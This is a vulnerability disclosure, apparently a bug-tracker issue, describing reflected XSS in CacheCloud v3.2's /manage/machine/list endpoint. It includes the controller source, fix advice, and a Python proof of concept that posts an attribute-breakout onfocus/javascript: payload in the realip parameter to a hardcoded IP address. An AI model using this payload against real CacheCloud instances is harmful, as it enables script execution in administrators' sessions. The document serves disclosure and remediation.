XSS vulnerability on /manage/machine/list
Summary
CacheCloud v3.2 (the latest release at the time of writing) has a reflected cross-site scripting (XSS) vulnerability in `/manage/machine/list`. The `doMachineList` controller shown below takes the request-bound string parameters `realip` and `ipLike` and places them in the model unchanged (`model.addAttribute("realip", realip)`, `model.addAttribute("ipLike", ipLike)`); the `manage/machine/machineList` view (not shown here) then apparently renders `realip` without HTML/attribute encoding, which is what the PoC's attribute-breakout payload (`X" tabindex="1" AUTOFoCUS OnFoCus=...`) relies on. `ipLike` flows to the view the same way and should be checked as well. Because `@RequestMapping({"/list"})` specifies no HTTP method, the same parameters are accepted on GET, so the payload can be delivered to a logged-in administrator as a crafted link, not only via the POST used in the PoC. The fix belongs at the sink: context-appropriate output encoding in the template (with a restrictive Content-Security-Policy as defense in depth).
Details
- SOURCE (the controller below; the actual SINK is the `manage/machine/machineList` view template, which is not reproduced here)
// src/main/java/com/sohu/cache/web/controller/MachineManageController.java#L110-L137
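/**
 * Renders the machine-management page for {@code /manage/machine/list}.
 *
 * <p>The {@code @RequestMapping} carries no {@code method} attribute, so the handler answers
 * GET and POST alike: every parameter below can arrive in a URL query string as well as in a
 * form body, which makes any reflection of them deliverable as a link.
 *
 * <p>SECURITY: {@code ipLike} and {@code realip} are request-controlled strings that are put
 * into the model verbatim and echoed back by the {@code manage/machine/machineList} view.
 * This controller performs no output encoding; the view must HTML/attribute-encode them
 * wherever it prints them (reflected XSS otherwise — see the PoC in this issue). The
 * {@code Integer} parameters are type-converted by Spring and cannot carry markup.
 *
 * @param request   unused; kept for the handler signature
 * @param response  unused; kept for the handler signature
 * @param model     view model populated by this method
 * @param tabTag    {@code "machine"} or {@code "room"} selects the view; anything else,
 *                  including a missing parameter, yields an empty view name
 * @param ipLike    machine filter, passed through to {@code machineCenter.getMachineStats}
 * @param versionId machine filter, passed through to {@code machineCenter.getMachineStats}
 * @param isInstall machine filter, passed through to {@code machineCenter.getMachineStats}
 * @param useType   machine filter, passed through to {@code machineCenter.getMachineStats}
 * @param type      machine filter, passed through to {@code machineCenter.getMachineStats}
 * @param k8sType   machine filter, passed through to {@code machineCenter.getMachineStats}
 * @param realip    machine filter, passed through to {@code machineCenter.getMachineStats}
 * @return the selected view together with its model
 */
@RequestMapping({"/list"})
public ModelAndView doMachineList(HttpServletRequest request, HttpServletResponse response, Model model, String tabTag, String ipLike, Integer versionId, Integer isInstall, Integer useType, Integer type, Integer k8sType, String realip) {
    // Constant-first equals: tabTag is request-bound and null when the parameter is absent;
    // the original tabTag.equals("machine") threw a NullPointerException (HTTP 500) then.
    if ("machine".equals(tabTag)) {
        List<MachineStats> machineList = this.machineCenter.getMachineStats(ipLike, useType, type, versionId, isInstall, k8sType, realip);
        Map<String, Integer> machineInstanceCountMap = this.machineCenter.getMachineInstanceCountMap();
        List<MachineRoom> roomList = this.machineCenter.getEffectiveRoom();
        model.addAttribute("roomList", roomList);
        model.addAttribute("list", machineList);
        model.addAttribute("isInstall", isInstall);
        model.addAttribute("versionId", versionId);
        model.addAttribute("useType", useType);
        // Untrusted string reflected to the view unchanged — the template must encode it.
        model.addAttribute("ipLike", ipLike);
        model.addAttribute("k8sType", k8sType);
        model.addAttribute("type", type);
        // Untrusted string reflected to the view unchanged — the template must encode it.
        model.addAttribute("realip", realip);
        model.addAttribute("machineActive", SuccessEnum.SUCCESS.value());
        // User-facing hint, "(please wait N minutes)", for stats collected on a cron schedule.
        model.addAttribute("collectAlert", "(请等待" + ConstUtils.MACHINE_STATS_CRON_MINUTE + "分钟)");
        model.addAttribute("machineInstanceCountMap", machineInstanceCountMap);
        return new ModelAndView("manage/machine/machineList");
    } else if ("room".equals(tabTag)) {
        List<MachineRoom> roomList = this.machineCenter.getAllRoom();
        model.addAttribute("roomList", roomList);
        return new ModelAndView("manage/machine/roomList");
    } else {
        // Unknown or missing tab: empty view name, unchanged from the original behavior.
        return new ModelAndView("");
    }
}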
137:
POC (the script sends an unauthenticated POST with no session cookie; if `/manage/` sits behind the admin login, expect a 302 to the login page and re-run the request with a valid session cookie)
import requests
from requests.sessions import Session
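class CustomSession(Session):
    """``requests.Session`` that forces a fixed set of browser-like headers onto every request.

    It is installed in place of ``requests.sessions.Session`` further down so that the
    module-level ``requests.post`` helper picks it up. The injected headers take precedence
    over any ``headers=`` the caller passes (the same precedence the original ``dict.update``
    gave them).
    """

    # Headers added to every request. Referer/Origin are pinned to the PoC target host.
    INJECTED_HEADERS = {
        'referer': 'http://34.169.199.145:40101/admin/app/list',
        'User-Agent': 'oxpecker',
        'accept-language': 'en-US',
        'x-requested-with': 'XMLHttpRequest',
        'origin': 'http://34.169.199.145:40101',
        'upgrade-insecure-requests': '1',
        'pragma': 'no-cache',
        'cache-control': 'no-cache',
        'accept-encoding': 'gzip, deflate',
    }

    def request(self, method, url, params=None, data=None, headers=None, cookies=None,
                files=None, auth=None, timeout=None, allow_redirects=True, proxies=None,
                hooks=None, stream=None, verify=None, cert=None, json=None):
        """Merge the injected headers into ``headers`` and delegate to ``Session.request``.

        The caller's mapping is copied before merging: the original implementation called
        ``.update()`` on the very dict the caller passed in, silently mutating it.
        """
        merged = dict(headers) if headers else {}
        merged.update(self.INJECTED_HEADERS)
        return super().request(
            method, url, params=params, data=data, headers=merged, cookies=cookies,
            files=files, auth=auth, timeout=timeout, allow_redirects=allow_redirects,
            proxies=proxies, hooks=hooks, stream=stream, verify=verify, cert=cert, json=json,
        )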
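# Install the header-injecting session: requests.post() instantiates
# requests.sessions.Session per call, so replacing the attribute is enough.
requests.sessions.Session = CustomSession
# ================================== Poc Start ===================================
import requests
url = 'http://34.169.199.145:40101/manage/machine/list'
# Attribute-breakout payload: presumably the value is echoed inside a double-quoted
# HTML attribute (e.g. a filter <input value="...">); the leading `X"` closes it and
# autofocus + onfocus makes the handler fire without any user interaction.
malicious_payload = 'X" tabindex="1" AUTOFoCUS OnFoCus="location=\'javascript:alert("zast-xss")\'"//'
# tabTag=machine is required to reach the branch that puts realip into the model.
payload = {'tabTag': 'machine', 'realip': malicious_payload}
# allow_redirects=False: if /manage/ is behind the admin login, the 302 to the login
# page stays visible instead of being followed; add a valid session cookie in that case.
response = requests.post(url, data=payload, verify=False, allow_redirects=False)
print('Status Code:', response.status_code)
# The defect is missing output encoding, so the meaningful check is whether the payload
# comes back byte-for-byte; an encoded echo (e.g. &quot;) would not be exploitable.
print('Payload reflected unencoded:', malicious_payload in response.text)
print('Text:', response.text)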
# =================================== Poc End ====================================
- Screenshot
